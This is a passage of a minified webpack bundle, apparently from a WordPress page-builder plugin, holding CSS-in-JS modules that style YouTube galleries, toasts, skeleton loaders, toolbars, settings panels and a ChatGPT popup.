.ultp-ytg-playlist-items{overflow-y:auto;border-radius:8px;box-sizing:border-box;height:100%;overflow-y:auto;background-color:#eaeaea}.ultp-layout-playlist .ultp-ytg-playlist-items::-webkit-scrollbar{width:8px}.ultp-layout-playlist .ultp-ytg-playlist-items::-webkit-scrollbar-track{background:#f1f1f1;border-radius:4px}.ultp-layout-playlist .ultp-ytg-playlist-items::-webkit-scrollbar-thumb{background:#888;border-radius:4px}.ultp-layout-playlist .ultp-ytg-playlist-items::-webkit-scrollbar-thumb:hover{background:#555}.ultp-layout-playlist .ultp-ytg-playlist-items .ultp-ytg-playlist-item{display:flex;gap:12px;padding:10px;cursor:pointer;transition:background .3s ease;border-radius:4px}.ultp-layout-playlist .ultp-ytg-playlist-items .ultp-ytg-playlist-item img{width:120px;height:68px;object-fit:cover;border-radius:4px}@media(max-width: 768px){.ultp-layout-playlist{flex-direction:column}.ultp-layout-playlist .ultp-ytg-main,.ultp-layout-playlist .ultp-ytg-playlist-sidebar{width:100%}.ultp-layout-playlist .ultp-ytg-playlist-items{height:400px}}.ultp-layout-playlist .ultp-ytg-playlist-item{display:flex;gap:12px;padding:10px;cursor:pointer;transition:background .3s ease;border-radius:2px}.ultp-layout-playlist .ultp-ytg-playlist-item img{width:120px;height:68px;object-fit:cover;border-radius:4px}.ultp-layout-playlist .ultp-ytg-playlist-item-content{flex:1;min-width:0}.ultp-layout-playlist .ultp-ytg-playlist-item-title{margin:0 0 5px;overflow:hidden;text-overflow:ellipsis;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}.ultp-layout-playlist .ultp-ytg-playlist-item-desc{overflow:hidden;text-overflow:ellipsis;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}.ultp-layout-inline.ultp-ytg-view-list .ultp-ytg-inside{margin-top:0px}.ultp-ytg-overlay.ultp-ytg-view-list .ultp-ytg-inside{position:absolute;top:0px;display:flex;align-items:center;justify-content:end;height:100%;pointer-events:none}.ultp-ytg-overlay.ultp-ytg-view-list .ultp-ytg-content{width:70%}.ultp-ytg-overlay.ultp-ytg-view-list .ultp-ytg-video{max-width:50%}.ultp-ytg-view-list>div{display:flex;gap:20px}.ultp-ytg-view-list>div:first-child{margin-bottom:0px !important}@media(max-width: 768px){.ultp-ytg-view-list>div{flex-direction:column}.ultp-ytg-view-list>div .ultp-ytg-video{flex:none}.ultp-ytg-view-list>div .ultp-ytg-title,.ultp-ytg-view-list>div .ultp-ytg-description{margin-left:0;margin-top:10px}}.ultp-ytg-view-grid{position:relative;width:100%}.ultp-ytg-loadmore-btn{width:fit-content;margin-left:auto;margin-right:auto;transition:.3s;cursor:pointer}.ultp-ytg-item{position:relative;width:100%}.ultp-ytg-item:not(.ultp-ytg-playlist-item){display:flex;flex-direction:column}.ultp-ytg-item .ultp-ytg-video{width:100%;transition:.3s}.ultp-ytg-item.active .ultp-ytg-video{height:100%}.ultp-ytg-item.active .ultp-ytg-video iframe{height:100%}.ultp-ratio-height .ultp-ytg-video{position:relative;height:0;overflow:hidden}.ultp-ratio-height .ultp-ytg-video img{position:absolute;top:0;left:0;width:100%;height:100%;object-fit:cover}@media(max-width: 768px){.ultp-ytg-container.ultp-layout-playlist{flex-direction:column;flex-wrap:nowrap}.ultp-ytg-container.ultp-layout-playlist iframe{min-height:300px}.ultp-ytg-playlist-items{height:400px}}.ultp-ytg-player-container{margin-bottom:20px;width:100%}.ultp-ytg-playlist-item{display:grid;grid-template-columns:120px 1fr;gap:15px;padding:10px;cursor:pointer;transition:background-color .3s ease;border-radius:4px}.ultp-ytg-playlist-item .ultp-ytg-video{position:relative;width:120px;height:67.5px;margin:0}.ultp-ytg-playlist-item .ultp-video-details{flex:1}.ultp-ytg-play-icon{position:absolute;top:50%;left:50%;transform:translate(-50%, -50%);width:40px;height:40px;background:rgba(0,0,0,.7);border-radius:50%;display:flex;align-items:center;justify-content:center}.ultp-ytg-play-icon:before{content:"";width:0;height:0;border-style:solid;border-width:8px 0 8px 12px;border-color:rgba(0,0,0,0) rgba(0,0,0,0) rgba(0,0,0,0) #fff;margin-left:3px}@media(max-width: 768px){.ultp-ytg-playlist-item{grid-template-columns:90px 1fr;gap:10px}.ultp-ytg-playlist-item .ultp-ytg-video{width:90px;height:50.625px}}.ultp-ytg-video{box-sizing:border-box;position:relative}.ultp-ytg-video .ultp-ytg-loading{height:100%;width:100%;display:flex;align-items:center;justify-content:center;position:relative;overflow:hidden;background:#eee}.ultp-ytg-video .ultp-ytg-loading::before{content:"";position:absolute;top:0;bottom:0;right:0;left:0;background:linear-gradient(90deg, #eee, #f5f5f5, #eee);background-size:200% 100%;animation:shimmer 1.2s infinite linear}.ultp-ytg-video img{width:100%;height:100%}.ultp-ytg-video iframe{background-color:#000}.ultp-ytg-video .ultp-ytg-loading{height:100%;min-height:100%}.ultp-ytg-play__icon{position:absolute;width:100%;height:100%;display:flex;align-items:center;justify-content:center;cursor:pointer;background-color:rgba(0,0,0,.53)}.ultp-ytg-playlist-input{max-width:400px;margin:0 auto}.ultp-ytg-playlist-input .components-base-control__label{color:#fff}.ultp-ytg-playlist-input input{padding:20px 20px !important;font-size:15px;font-weight:400;border-radius:4px;border:1px solid #f03}.ultp-ytg-video-wrapper{display:flex;flex-direction:column;height:100%;width:100%}.ultp-ytg-video-wrapper iframe{height:100%}.ultp-ytg-video{width:100%;display:flex;justify-content:center;align-items:center}.ultp-ytg-video.loading-active{height:100%}.ultp-ytg-inside{width:100%}.ultp-ytg-content{width:100%}.ytg-loader{width:35px;height:35px;border-radius:50%;position:relative;animation:rotate 1s linear infinite}.ytg-loader::before{content:"";box-sizing:border-box;position:absolute;inset:0px;border-radius:50%;border:5px solid;animation:prixClipFix 2s linear infinite}@keyframes rotate{100%{transform:rotate(360deg)}}@keyframes prixClipFix{0%{clip-path:polygon(50% 50%, 0 0, 0 0, 0 0, 0 0, 0 0)}25%{clip-path:polygon(50% 50%, 0 0, 100% 0, 100% 0, 100% 0, 100% 0)}50%{clip-path:polygon(50% 50%, 0 0, 100% 0, 100% 100%, 100% 100%, 100% 100%)}75%{clip-path:polygon(50% 50%, 0 0, 100% 0, 100% 100%, 0 100%, 0 100%)}100%{clip-path:polygon(50% 50%, 0 0, 100% 0, 100% 100%, 0 100%, 0 0)}}.ultp-ytg-loading{grid-template-columns:repeat(3, 1fr) !important}.ultp-ytg-loading.gallery-postx .skeleton-box{min-height:auto}.ultp-ytg-playlist-loading{min-height:300px;justify-content:center;display:flex;align-items:center;justify-content:center;width:100%}.ultp-ytg-play__icon.ytg-icon-animation{cursor:pointer;width:50px;height:50px;border-radius:50%;display:flex;align-items:center;justify-content:center;animation:pulse-border 1.2s ease-in infinite}@keyframes pulse-border{0%{box-shadow:0 0 0 10px var(--ultp-pulse-color)}70%{box-shadow:0 0 0 25px rgba(255,67,142,0)}100%{box-shadow:0 0 0 10px rgba(255,67,142,0)}}.postx-page .ultp-ytg-loading.gallery-postx.gallery-active{position:static !important}.postx-page .ultp-ytg-container:has(>div.ultp-ytg-loading.gallery-postx.gallery-active){display:block !important}.ultp-ytg-error{padding:40px;text-align:center;background-color:#eee;font-size:16px;color:#000;font-weight:500;border:2px solid #224efe;border-radius:5px}.ultp-ytg-error .ultp-ytg-error-message{font-size:12px;font-weight:400;text-transform:capitalize;font-style:italic;display:flex;justify-content:center;gap:8px}.ultp-ytg-error .ultp-field-wrap.ultp-field-groupbutton{max-width:400px;margin:0 auto}.ultp-ytg-error .ultp-field-wrap.ultp-field-groupbutton input{text-align:center}.ultp-ytg-error-dev-api-message{text-align:center;margin:25px;color:red;font-size:16px;font-weight:500}.ultp-ytg-content .ultp-ytg-title a{color:#000}.ultp-layout-inline.ultp-ytg-overlay .ultp-ytg-item.active .ultp-ytg-inside,.ultp-layout-classic.ultp-ytg-overlay .ultp-ytg-item.active .ultp-ytg-inside{display:none}.ultp-layout-inline.ultp-ytg-overlay .ultp-ytg-title a,.ultp-layout-classic.ultp-ytg-overlay .ultp-ytg-title a{color:#fff}.ultp-layout-inline.ultp-ytg-overlay .ultp-ytg-inside,.ultp-layout-classic.ultp-ytg-overlay .ultp-ytg-inside{position:absolute;top:0px;display:flex;align-items:flex-end;justify-content:center;height:100%;pointer-events:none;width:100%}.ultp-ytg-card .ultp-ytg-title a{color:#000}.ultp-youtube-dev-api-key{text-align:center;display:block;font-size:13px;font-weight:500;padding:16px 0px;background:#eef4fa}',""]);const r=n},30439:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".toastMessages{display:flex;flex-direction:column;gap:10px;padding:10px;position:fixed;right:400px;z-index:1001;top:70px}.toast{position:absolute}.toaster{position:fixed;visibility:hidden;width:345px;background-color:#fefefe;height:76px;border-radius:4px;box-shadow:0px 0px 4px #9f9f9f;display:flex;align-items:center}.toaster span{display:block}.toaster .itmCenter{font-size:14px}.toaster .itmLast{padding:0 15px;margin-left:auto;height:100%;display:flex;align-items:center;border-left:1px solid #f2f2f2}.toaster .itmLast:hover{cursor:pointer;background-color:#f2f2f2}.toaster.show{visibility:visible;-webkit-animation:fadeinmessage .7s;animation:fadeinmessage .7s}@keyframes fadeinmessage{from{right:0;opacity:0}to{right:65px;opacity:1}}.circle{stroke-dasharray:166;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;color:#7ac142;fill:none;animation:strokemessage .6s cubic-bezier(0.65, 0, 0.45, 1) forwards}.animation{width:45px;height:45px;border-radius:50%;display:block;stroke-width:2;margin:10px;color:#fff;stroke-miterlimit:10;box-shadow:inset 0px 0px 0px #7ac142;animation:fillmessage .4s ease-in-out .4s forwards,scalemessage .3s ease-in-out .9s both;margin-right:10px}.check{transform-origin:50% 50%;stroke-dasharray:48;stroke-dashoffset:48;animation:strokemessage .3s cubic-bezier(0.65, 0, 0.45, 1) .8s forwards}.cross{color:red;fill:red}@keyframes strokemessage{100%{stroke-dashoffset:0}}@keyframes scalemessage{0%,100%{transform:none}50%{transform:scale3d(1.1, 1.1, 1)}}@keyframes fillmessage{100%{box-shadow:inset 0px 0px 0px 30px #7ac142}}",""]);const r=n},11211:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,'.ultp_skeleton__image{height:300px;width:300px;border-radius:4px}.ultp_skeleton__circle{height:300px;width:300px;border-radius:50%}.ultp_skeleton__title{height:20px;width:100%;border-radius:4px}.ultp_skeleton__button{height:40px;width:90px;border-radius:4px}.ultp_frequency{position:relative;background-color:#e2e2e2;overflow:hidden}.ultp_frequency.loop{margin-bottom:10px}.ultp_frequency.loop:last-child{margin-bottom:0}.ultp_frequency::after{display:block;content:"";position:absolute;width:100%;height:100%;transform:translateX(-100%);background:-webkit-gradient(linear, left top, right top, from(transparent), color-stop(rgba(255, 255, 255, 0.2)), to(transparent));background:linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.2), transparent);animation:loadings .8s infinite}.skeletonOverflow{overflow:hidden}@keyframes loadings{100%{transform:translateX(100%)}}',""]);const r=n},31022:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,'.ultp-toolbar-group{display:flex;position:relative}.ultp-toolbar-group-bg{background-color:#deefff}.ultp-toolbar-group-bg-offset{min-height:100px}.ultp-toolbar-group-bg-offset::before{background-color:#deefff;content:"";position:absolute;top:0;right:0;height:100%;z-index:-1;left:-6px;width:calc(100% - 1px)}.ultp-toolbar-group-text{position:absolute;top:auto !important;bottom:100%;width:calc(100% + 1px);transform:translateX(-1px);text-align:center;background-color:#037fff;padding-block:8px;border-top-left-radius:3px;border-top-right-radius:3px;overflow:hidden}.ultp-toolbar-group-text-inner{font-weight:bolder;color:#fff;text-transform:uppercase}.ultp-toolbar-group-text-bottom{position:absolute;bottom:0px;width:calc(100% + 1px);transform:translateX(-7px);text-align:center;background-color:#037fff;padding-block:7px;overflow:hidden}.ultp-toolbar-group-text-bottom-inner{text-transform:uppercase;font-weight:bolder;font-size:smaller;color:#fff}.ultp-toolbar-text-ticker-wrapper .ultp-toolbar-group-text-inner{display:block;animation:ticker 4s linear infinite;text-wrap:nowrap;width:max-content}@keyframes ticker{0%{transform:translateX(110%)}100%{transform:translateX(-110%)}}.ultp-toolbar-group-block{position:relative}.ultp-toolbar-group-block-overlay{position:absolute;z-index:5;top:0;bottom:0;left:0;right:0;background-color:rgba(224,251,231,.9);display:flex;justify-content:center;align-items:center}.ultp-toolbar-group-block-overlay a{color:#2bb749 !important;font-size:1rem;font-weight:bolder;text-transform:uppercase;text-decoration:none !important}.ultp-toolbar-group-block-placeholder{display:flex;justify-content:center;align-items:center;gap:20px;padding-inline:5px;transform:translateY(50%)}',""]);const r=n},70398:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-add-dc-button{width:100%;display:flex;align-items:center;justify-content:center;border:1px dashed #757575;padding:5px 10px;border-radius:3px;cursor:pointer;font-size:14px;line-height:normal;background-color:rgba(0,0,0,0);margin-block:10px;pointer-events:all}.ultp-add-dc-button-disabled{color:gray;cursor:not-allowed}.ultp-add-dc-button-top{position:relative;z-index:999999}.ultp-add-dc-button-inverse{color:#fff;border-color:#fff}",""]);const r=n},33099:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-dynamic-content-wrapper .components-popover__content{min-width:370px;padding:0 !important;border:1px solid #1e1e1e;outline:0 !important}.ultp-dynamic-content-wrapper .components-popover__content::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#f5f5f5}.ultp-dynamic-content-wrapper .components-popover__content::-webkit-scrollbar{width:3px;background-color:#f5f5f5}.ultp-dynamic-content-wrapper .components-popover__content::-webkit-scrollbar-thumb{background-color:#000;border:2px solid #555}.ultp-dynamic-content-dropdown .components-base-control{margin-bottom:24px !important}.ultp-dynamic-content-dropdown .components-input-control__container{margin-left:auto;max-width:190px !important}.ultp-dynamic-content-dropdown-button{width:100%;justify-content:center}.ultp-dynamic-content-dropdown .components-panel__body{margin-bottom:24px}.ultp-dynamic-content-dropdown .ultp-field-search{display:flex}.ultp-dynamic-content-dropdown .ultp-field-search .ultp-popup-select{width:190px !important}.ultp-richtext-dynamic-content{border-bottom:3px double #037fff}.ultp-dynamic-content-fields{padding:30px 15px 30px 15px}.ultp-dynamic-content-fields .ultp-popup-select{max-width:190px !important;margin-left:auto}.ultp-dynamic-content-fields .ultp-popup-select li,.ultp-dynamic-content-fields .ultp-popup-select .ultp-search-value{font-size:unset}.ultp-dynamic-content-fields .ultp-popup-select ul{max-width:330px;width:max-content;max-height:300px !important}.ultp-dynamic-content-fields .ultp-field-wrap{padding-top:0px !important;padding-bottom:0px !important;margin-bottom:24px !important}.ultp-dynamic-content-textfield{display:flex;align-items:center;justify-content:space-between;margin-bottom:24px !important}.ultp-dynamic-content-textfield .components-base-control{margin-bottom:0px !important;flex-basis:190px}.ultp-dynamic-content-textfield .components-base-control__field{margin-bottom:0px !important}.ultp-dynamic-content-textfield label{font-size:11px;font-weight:500;line-height:1.4;text-transform:uppercase;box-sizing:border-box;display:block;padding-top:0px;padding-bottom:0px;max-width:100%;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.ultp-dyanmic-content-pro{padding:20px 15px 20px 15px;background-color:#fff3f4}.ultp-dyanmic-content-pro-link{width:fit-content;display:flex;gap:3px;align-items:center;color:#f0406a;font-size:13px;text-decoration:none;margin-top:8px;border-bottom:1px solid #f0406a}.ultp-dyanmic-content-pro-link svg{fill:#f0406a}.ultp-dyanmic-content-pro-link:hover{color:#f0406a}.ultp-dynamic-content-empty{text-align:center;font-size:14px;padding:10px 15px}.ultp-dc-icon-control .ultp-field-icons{display:flex;align-items:center;justify-content:space-between;width:auto}.ultp-dc-icon-control .ultp-field-wrap{padding-top:0px}.ultp-dc-icon-control .ultp-sub-field{margin-top:0px;width:auto;flex-basis:190px}.ultp-dc-icon-control .ultp-icon-input{width:-webkit-fill-available}",""]);const r=n},14437:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-toolbar-sort{display:flex;flex-direction:column;justify-content:center;gap:3px}.ultp-toolbar-sort-btn{cursor:pointer;display:flex;justify-content:center;align-items:center;height:18px;margin-left:-5px;transition:all 200ms ease-in-out}.ultp-toolbar-sort-btn svg{color:#000;width:24px;height:auto}.ultp-toolbar-sort-btn:hover{background-color:rgba(3,127,255,.7);border-radius:3px}.ultp-toolbar-sort-btn:hover svg{color:#fff}.ultp-toolbar-sort-horizontal{flex-direction:row !important;align-items:center}.ultp-toolbar-sort-horizontal .ultp-toolbar-sort-btn{rotate:-90deg}",""]);const r=n},97921:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-responsive-device{position:relative;margin-right:5px}.ultp-responsive-device:hover .ultp-device-dropdown{display:block}.ultp-responsive-device .ultp-selected-device{min-width:18px;height:18px;outline:1px solid #cbced7;border-radius:2px;padding:1px 3px 1px 3px;color:#272727}.ultp-responsive-device .ultp-device-dropdown{display:none;min-width:18px;position:absolute;top:100%;left:0;z-index:3;background:#fff;outline:1px solid #cbced7;border-radius:2px;cursor:pointer}.ultp-responsive-device .ultp-device-dropdown .ultp-device-dropdown-item{color:#272727}.ultp-responsive-device .ultp-device-dropdown .ultp-device-dropdown-item.active{background-color:#eef4fa;color:#037fff}.ultp-responsive-device .ultp-device-dropdown .ultp-device-dropdown-item svg{padding:2px 3px}.ultp-device{display:inline-block;position:relative;top:3px}",""]);const r=n},10912:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-field-unit-list{position:relative;margin-right:4px}.ultp-field-unit-list:hover .ultp-unit-dropdown{display:block}.ultp-field-unit-list .ultp-unit-checked{width:fit-content;height:18px;outline:1px solid #cbced7;border-radius:2px;padding:0px 3px;font-size:14px;line-height:14px;color:#000}.ultp-field-unit-list .ultp-unit-dropdown{display:none;width:fit-content;position:absolute;top:100%;left:0;z-index:3;background:#fff;outline:1px solid #cbced7;border-radius:2px;cursor:pointer}.ultp-field-unit-list .ultp-unit-dropdown .ultp-unit-dropdown-item{padding:0px 3px;color:#272727}.ultp-field-unit-list .ultp-unit-dropdown .ultp-unit-dropdown-item.active{background-color:#eef4fa;color:#037fff}",""]);const r=n},4:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-postx-settings-panel-title{display:flex;align-items:center;gap:15px}.ultp-postx-settings-panel-title span:first-child{display:flex;justify-content:center;align-items:center;cursor:pointer}.ultp-postx-settings-panel-title span:first-child svg{width:15px;height:100%}.ultp-postx-settings-panel-title span:first-child:hover{color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9))}.ultp-preset-save-wrapper{padding:10px;border-bottom:1px solid #ddd;text-align:center}.ultp-preset-save-wrapper .ultp-preset-save-btn{background:var(--postx-primary-color);border:none;padding:10px 20px;border-radius:4px;width:100%;color:#fff;opacity:.4;cursor:default;display:flex;justify-content:center;align-items:center;gap:5px;pointer-events:none}.ultp-preset-save-wrapper .ultp-preset-save-btn.active{opacity:1;cursor:pointer;pointer-events:inherit}.ultp-preset-save-wrapper .ultp-preset-save-btn.active:hover{background:var(--postx-primary-hover-color)}.ultp-preset-save-wrapper .ultp-preset-save-btn svg{animation:spins 1s linear infinite;height:12px;width:12px;fill:#fff;margin-top:2px}.ultp-preset-options-tab{padding:15px 16px;border-bottom:1px solid #e2e2e2}.ultp-preset-options-tab .ultp-color-field-tab{text-align:center}.ultp-preset-options-tab .ultp-color-field-tab .preset-choose{color:var(--postx-primary-color);cursor:pointer;display:flex;gap:6px;align-items:center;font-size:14px}.ultp-preset-options-tab .ultp-color-field-tab .preset-choose>div{margin-top:2px;margin-left:2px}.ultp-preset-options-tab .ultp-color-field-tab .preset-choose>div svg{height:10px;width:10px}.ultp-preset-options-tab .ultp-color-field-tab .preset-choose>div svg path{fill:var(--postx-primary-color)}.ultp-editor-dark-key-container{display:flex;align-items:center;gap:10px;margin:20px 0;font-size:14px}.ultp-editor-dark-key-container .light-label{margin-top:-14px;color:#000}.ultp-editor-dark-key-container .ultp-field-wrap.ultp-field-toggle{padding-top:0}.ultp-editor-dark-key-container .ultp-field-wrap.ultp-field-toggle .components-toggle-control__label{margin-left:10px;color:#868686}.ultp-editor-dark-key-container.dark-active .light-label{color:#868686}.ultp-editor-dark-key-container.dark-active .ultp-field-toggle .components-toggle-control__label{color:#000}.ultp-global-current-content{display:flex;justify-content:space-between;background:var(--postx_preset_Base_1_color);padding:10px 20px;border-radius:4px;border:solid 1px #e0e0e0;max-height:48px;cursor:pointer}.ultp-global-current-content.seleted .ultp-global-color{border:none;box-shadow:none}.ultp-global-current-content .ultp-preset-typo-show>span{font-size:22px}.ultp-global-current-content .ultp-preset-color-show{display:flex;gap:10px}.ultp-global-current-content .ultp-preset-color-show .ultp-global-color{height:20px;width:20px}.ultp-preset-color-tabs{padding:15px 16px}.ultp-preset-color-tabs .ultp-global-color-label-content{font-weight:500}.ultp-preset-color-tabs .ultp-global-color-label .ultp-color-field-tab>div{padding:3px 10px;font-size:12px}.ultp-editor-preset-typo-lists{display:flex;justify-content:space-between;align-items:center;gap:6px}.ultp-editor-preset-typo-lists.ultp-preset-color-label{margin-top:-10px;margin-bottom:15px}.ultp-editor-preset-typo-lists.ultp-preset-color-label .typo-label-container{padding:8px 10px;border:1px solid #e0e0e0;border-radius:4px}.ultp-editor-preset-typo-lists.ultp-preset-color-label .typo-label-container .color-delete{cursor:pointer;height:22px;width:22px;background:#d30b08;border-radius:2px;display:flex;align-items:center;justify-content:center}.ultp-editor-preset-typo-lists.ultp-preset-color-label .typo-label-container .color-delete svg{fill:#fff;height:18px;width:18px}.ultp-editor-preset-typo-lists .typo-label-container{width:100%;padding:10px;display:flex;gap:5px;justify-content:space-between;align-items:center}.ultp-editor-preset-typo-lists .typo-label-container .typo-label-demo{display:flex;gap:5px;justify-content:space-between;align-items:center}.ultp-editor-preset-typo-lists .typo-label-container .typo-label-demo .typo-demo{border-radius:2px;border:solid 1px #707070;padding:1px 5px;font-size:10px;color:#000}.ultp-editor-preset-typo-lists .typo-label-container .typo-label-demo .typo-label{font-size:12px;color:#000}.ultp-editor-preset-typo-lists .typo-label-container .typo-label-demo input.typo-label{font-size:10px;max-width:130px;background:#f8f8f8;border-radius:2px;border:solid 1px #efefef;padding:6px 2px}.ultp-editor-preset-typo-lists .ultp-editor-typo-actions{display:flex;align-items:center;gap:5px;padding:10px}.ultp-editor-preset-typo-lists .typo-delete,.ultp-editor-preset-typo-lists .typo-edit{visibility:hidden;height:22px;width:22px;background:#7d7d7d;border-radius:2px;display:flex;align-items:center;justify-content:center}.ultp-editor-preset-typo-lists .typo-delete svg,.ultp-editor-preset-typo-lists .typo-edit svg{fill:#eaeaea;height:18px;width:18px}.ultp-editor-preset-typo-lists:hover .typo-delete,.ultp-editor-preset-typo-lists:hover .typo-edit{visibility:visible}.ultp-editor-global-typo-container{padding-top:6px}.ultp-editor-background-setting-container{margin-top:20px}.ultp-editor-background-setting-container .ultp-editor-background-setting-label{font-size:12px;color:#000;margin-bottom:10px}.ultp-editor-background-setting-container .ultp-editor-background-setting-content{border:1px solid #e0e0e0;padding:10px;border-radius:2px}.ultp-editor-background-setting-container .ultp-editor-background-setting-content .ultp-editor-background-demo{height:50px;border:1px solid #e3e3e3;border-radius:2px}.ultp-editor-background-setting-container .ultp-editor-background-setting-content .ultp-color2-btn__group{border-color:#e3e3e3}.ultp-editor-background-setting-container .ultp-editor-background-setting-content .ultp-sub-field,.ultp-editor-background-setting-container .ultp-editor-background-setting-content .ultp-color2-btn__group{width:100%}",""]);const r=n},99243:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-chatgpt-popup .ultp-popup-wrap{max-width:790px;height:fit-content;margin:100px auto 0;background:#fff}@media only screen and (max-width: 800px){.ultp-chatgpt-popup .ultp-popup-wrap{height:80%}}.ultp-chatgpt-popup .ultp-popup-filter-title{min-height:52px;padding:0 20px !important}.ultp-chatgpt-popup .ultp-popup-filter-title span{text-transform:none}.ultp-chatgpt-popup .ultp-btn-close{height:52px;width:54px}.ultp-chatgpt-popup .ultp-popup-filter-image-head img{width:32px}.ultp-chatgpt-wrap{background-color:#fff;padding:40px 60px}.ultp-chatgpt-wrap .ultp-error-notice{margin-bottom:20px;padding:12px 16px;border-radius:6px;border:1px solid rgba(255,236,181,.5);background-color:rgba(255,243,205,.4);font-size:14px;color:#67531e}.ultp-chatgpt-wrap .ultp-chatgpt-search{display:flex;gap:10px}.ultp-chatgpt-wrap .ultp-chatgpt-search input{flex-basis:90%}.ultp-chatgpt-popup-content input{padding:5px 5px 5px 20px;border-radius:4px;border:solid 1px #e7e7e7;max-height:40px}.ultp-chatgpt-popup-content .ultp-ask-chatgpt-button{max-width:130px;display:inline-flex;align-items:center;padding:5px 8px 5px 8px;border-radius:4px;max-height:40px}.ultp-chatgpt-popup-content .ultp-ask-chatgpt-button,.ultp-chatgpt-popup-content .ultp-ask-chatgpt-button:hover{border:solid 1px #10a37f !important;background:#10a37f !important;color:#fff !important}.ultp-chatgpt-popup-content .ultp-ask-chatgpt-button:focus{outline:none;box-shadow:none;border:solid 1px #10a37f !important}.ultp-chatgpt-popup-content .ultp-ask-chatgpt-button .dashicons{line-height:normal;margin-right:5px}.ultp-chatgpt-popup-content .ultp-ask-chatgpt-button .chatgpt-loader{margin-right:5px;margin-left:6px;border-color:#095d49;border-top-color:#fff}.ultp-chatgpt-popup-content textarea{width:100%;min-height:120px;border:1px solid #e7e7e7;border-radius:4px;padding:15px 20px}.ultp-chatgpt-popup-content .ultp-btn-items{display:flex;flex-wrap:wrap;gap:5px;margin:20px 0 30px}.ultp-chatgpt-popup-content .ultp-btn-items .ultp-btn-item{border:1px solid #e7e7e7;padding:7px 12px;background:#fafafa;border-radius:4px;cursor:pointer;transition:400ms;font-size:14px;line-height:normal}.ultp-chatgpt-popup-content .ultp-btn-items .ultp-btn-item:has(select){padding:0px}.ultp-chatgpt-popup-content .ultp-btn-items .ultp-btn-item select{border:none;background-color:rgba(0,0,0,0);line-height:normal;min-height:auto;padding:7px 24px 7px 12px;font-size:14px}.ultp-chatgpt-popup-content .ultp-btn-items .ultp-btn-item select:focus{border:none;outline:0}.ultp-chatgpt-popup-content .ultp-btn-items .ultp-btn-item:hover{background:#f2f2f2}.ultp-chatgpt-popup-content .ultp-btn-items .ultp-btn-item .chatgpt-loader{top:3px;position:relative}.ultp-chatgpt-popup-content .ultp-btn-items:has(.chatgpt-loader) .ultp-btn-item:not(:has(.chatgpt-loader)){pointer-events:none;opacity:.5}.ultp-chatgpt-popup-content .ultp-center{display:flex;justify-content:center;gap:15px}.ultp-chatgpt-popup-content .ultp-center .ultp-btn .dashicons{vertical-align:middle}.ultp-chatgpt-input-container .ultp-chatgpt-api-warning{margin:auto auto;width:fit-content;color:#1e1e1e;margin-bottom:30px;font-size:20px;display:flex;align-items:center}.ultp-chatgpt-input-container .ultp-chatgpt-api-warning a{color:#037fff;text-decoration:underline;margin:0 2px}.ultp-chatgpt-input-container .ultp-chatgpt-api-warning svg{margin-right:10px}.ultp-chatgpt-nokey .ultp-btn-items,.ultp-chatgpt-nokey .ultp-center,.ultp-chatgpt-nokey .ultp-ask-chatgpt-button{opacity:.5;pointer-events:none}.chatgpt-loader{display:inline-block;border:3px solid var(--postx-primary-color);border-radius:50% !important;border-top:3px solid #fff;width:8px;height:8px;animation:spins 1s linear infinite;margin-right:8px}@keyframes spins{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}",""]);const r=n},84586:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-label-tag-pro{display:inline-block;padding:0 3px;font-weight:bold;border-radius:3px;font-size:10px;margin-left:5px;background-color:#037fff;color:#fff}.ultp-label-tag-pro a{color:#fff !important;text-decoration:none !important}.ultp-label-tag-new{display:inline-block;padding:0 3px;font-weight:bold;border-radius:3px;font-size:10px;margin-left:5px;background-color:#4caf50;color:#fff}.ultp-label-tag-dep{display:inline-block;padding:0 3px;font-weight:bold;border-radius:3px;font-size:10px;margin-left:5px;background-color:#ff5733;color:#fff}.ultp-editor-support{text-align:center;padding:22px 15px;border-top:1px solid #e0e0e0;background-color:#f9f9f9}.ultp-editor-support .ultp-editor-support-content{display:flex;flex-direction:column;align-items:center;gap:20px}.ultp-editor-support .ultp-editor-support-content .logo{height:40px;width:auto}.ultp-editor-support .ultp-editor-support-content .title{color:#000;font-size:20px;font-weight:bolder}.ultp-editor-support .ultp-editor-support-content .descp{color:#000;font-size:14px;text-align:center}.ultp-editor-support .ultp-editor-support-content a{padding:10px 25px;color:#fff;font-size:14px;font-weight:bold;line-height:1.4;background:linear-gradient(180deg, #399aff, transparent) #004fd0;border-radius:4px;text-decoration:none;display:inline-block;border:none;transition:background-color 400ms}.ultp-editor-support .ultp-editor-support-content a:hover{background-color:var(--postx-primary-color)}",""]);const 